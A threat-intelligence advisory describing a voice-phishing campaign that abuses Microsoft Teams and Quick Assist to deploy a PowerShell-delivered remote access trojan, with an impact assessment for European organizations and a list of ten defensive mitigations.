The 'Quick, You Need Assistance!' campaign is a sophisticated voice-phishing attack leveraging Microsoft Teams to socially engineer targets into initiating remote sessions via Quick Assist, a legitimate Microsoft remote administration tool. The attackers impersonate help desk personnel to gain initial access, exploiting user trust to bypass technical barriers. Once access is granted, they perform user group enumeration to map the environment and execute PowerShell scripts that download and deploy a command and control (C2) payload. The payload includes a web-socket based remote access trojan (RAT), enabling persistent, encrypted communications with the attackers' infrastructure. To evade detection, the campaign uses AMSI (Antimalware Scan Interface) bypass techniques, which allow malicious PowerShell scripts to run without triggering endpoint protection alerts. The attackers operate multiple Microsoft 365 tenants with IT-related subdomains to lend legitimacy and diversify attack vectors, alongside a broad range of IP addresses and domains for their C2 servers. The campaign shares tactics and infrastructure similarities with known cybercrime groups Storm-1811 and PhantomCaptcha, suggesting it is part of a larger, complex cybercrime ecosystem. While ransomware deployment is suspected as the final objective, no successful ransomware infections have been observed, indicating effective defensive measures so far. Indicators of compromise include specific IP addresses and domains linked to the campaign, as well as URLs hosting malicious PDF files used as decoys or additional payload delivery mechanisms. The attack chain relies heavily on social engineering, PowerShell scripting, and abuse of legitimate remote assistance tools, highlighting the need for combined technical and user-focused defenses.

For European organizations, this campaign poses significant risks especially to IT departments and help desk personnel who are targeted via voice-phishing on Microsoft Teams. Successful exploitation can lead to unauthorized remote access, enabling attackers to move laterally, harvest credentials, and deploy ransomware or other malware. The use of legitimate tools like Quick Assist complicates detection and response, increasing the risk of prolonged undetected intrusions. Confidentiality is at risk due to potential data exfiltration via the RAT. Integrity and availability could be severely impacted if ransomware is deployed, disrupting business operations and causing financial and reputational damage. The campaign’s use of multiple Microsoft 365 tenants and IT-related subdomains increases the likelihood of targeting organizations heavily reliant on Microsoft cloud services, common across Europe. The encrypted communications and AMSI bypass techniques reduce the effectiveness of traditional endpoint detection solutions, requiring advanced monitoring capabilities. Although no ransomware infections have been confirmed, the potential for escalation remains high, especially in sectors with critical infrastructure or sensitive data. The campaign’s social engineering vector also highlights the human factor as a critical vulnerability. Overall, European organizations face a medium to high operational risk from this threat, particularly those with extensive Microsoft Teams and Quick Assist usage.

1. Conduct targeted security awareness training focusing on voice-phishing and social engineering tactics, especially for IT and help desk staff. 2. Implement strict policies and controls around the use of Quick Assist and other remote assistance tools, including requiring multi-factor authentication and session logging. 3. Monitor PowerShell execution with enhanced logging and restrict the use of unsigned or obfuscated scripts. 4. Deploy endpoint detection and response (EDR) solutions capable of detecting AMSI bypass attempts and anomalous PowerShell behavior. 5. Use network monitoring to identify unusual encrypted web-socket traffic and connections to known malicious IPs/domains associated with this campaign. 6. Enforce conditional access policies in Microsoft 365 to limit access from suspicious tenants or subdomains. 7. Regularly review and audit Microsoft 365 tenant configurations and permissions to detect unauthorized changes or suspicious activity. 8. Maintain updated threat intelligence feeds and integrate IoCs from this campaign into security tools for proactive detection. 9. Prepare and test incident response plans specifically addressing remote access abuse and ransomware scenarios. 10. Encourage reporting of suspicious Teams calls or requests for remote assistance to security teams for rapid investigation.